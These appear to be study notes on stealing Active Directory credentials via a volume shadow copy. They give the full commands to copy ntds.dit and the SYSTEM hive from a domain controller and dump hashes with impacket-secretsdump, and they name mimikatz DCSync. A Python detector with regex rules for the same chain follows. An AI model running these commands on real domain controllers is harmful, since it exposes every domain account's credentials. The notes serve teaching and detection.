Shadow Copies
The Volume Shadow Service (VSS) in Windows allows for the creation of snapshots of volumes or files. An attacker can leverage the vshadow utility to create a shadow copy of the AD database, ntds.dit, from a DC. After extracting the database and SYSTEM hive, they can use tools like impacket-secretsdump to dump user credentials, including NTLM hashes and Kerberos keys, offline.
The SYSTEM hive is a registry file that stores system-level information in Windows; it holds the boot key that is required to decrypt the ntds.dit database for credential extraction.
In our scenario we will log in to DC1 as jeffadmin.
Create a shadow copy of the C: drive on DC1 with vshadow.exe (-nw disables writers, -p stores the copy on disk).
vshadow.exe -nw -p C:

Once the snapshot is created, we will use the shadow copy device name to copy ntds.dit to the local disk.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Extract the SYSTEM registry hive.

reg.exe save hklm\system c:\system.bak

Transfer the .bak files to our attacker machine and extract the credentials.

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

DCSync with mimikatz is a stealthier method for extracting user hashes from a DC without leaving as obvious a trail.
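The defensive counterpart, added here as an example and not part of the original notes: a small Python detector that runs over constructed Sysmon-style process-creation records (the host names, user names and command lines are made up) and flags any host/user pair that shows at least two stages of the chain above (shadow copy creation, ntds.dit copied from a shadow device, SYSTEM hive saved).

```python
import re

# Constructed sample process-creation records (not from any real host),
# shaped like what a Sysmon Event ID 1 collector exports.
SAMPLE_EVENTS = [
    {"host": "DC1", "user": "CORP\\jeffadmin", "cmd": r"vshadow.exe -nw -p C:"},
    {"host": "DC1", "user": "CORP\\jeffadmin",
     "cmd": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak"},
    {"host": "DC1", "user": "CORP\\jeffadmin", "cmd": r"reg.exe save hklm\system c:\system.bak"},
    # Benign-looking activity on a workstation: only lists snapshots, creates nothing.
    {"host": "WS07", "user": "CORP\\backup_svc", "cmd": r"vssadmin list shadows"},
]

# One regex per stage of the ntds.dit-via-shadow-copy chain.
RULES = {
    # vshadow/vssadmin/diskshadow invoked with a creating switch (-p or "create")
    "shadow_copy_created": re.compile(
        r"(vshadow|vssadmin|diskshadow)(\.exe)?\b.*(\bcreate\b|\s-p\b)", re.I),
    # ntds.dit read through a HarddiskVolumeShadowCopyN device path
    "ntds_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+.*ntds\.dit", re.I),
    # SYSTEM hive exported with reg save
    "system_hive_saved": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
}


def match_rules(cmd: str) -> list[str]:
    """Return the names of every stage rule that matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def detect_ntds_dump(events: list[dict]) -> dict[tuple[str, str], list[str]]:
    """Group matched stages per (host, user); report pairs with 2+ stages.

    Requiring two stages keeps a lone 'reg save' or snapshot by a backup
    job from paging anyone, while the full chain on a DC is hard to miss.
    """
    seen: dict[tuple[str, str], set[str]] = {}
    for ev in events:
        hits = match_rules(ev["cmd"])
        if hits:
            seen.setdefault((ev["host"], ev["user"]), set()).update(hits)
    return {key: sorted(stages) for key, stages in seen.items() if len(stages) >= 2}


if __name__ == "__main__":
    for (host, user), stages in detect_ntds_dump(SAMPLE_EVENTS).items():
        print(f"ALERT {host} {user}: {', '.join(stages)}")
```

In a real deployment the same rules would also be fed by file-access auditing on ntds.dit (Event ID 4663) and VSS service events, not just command lines.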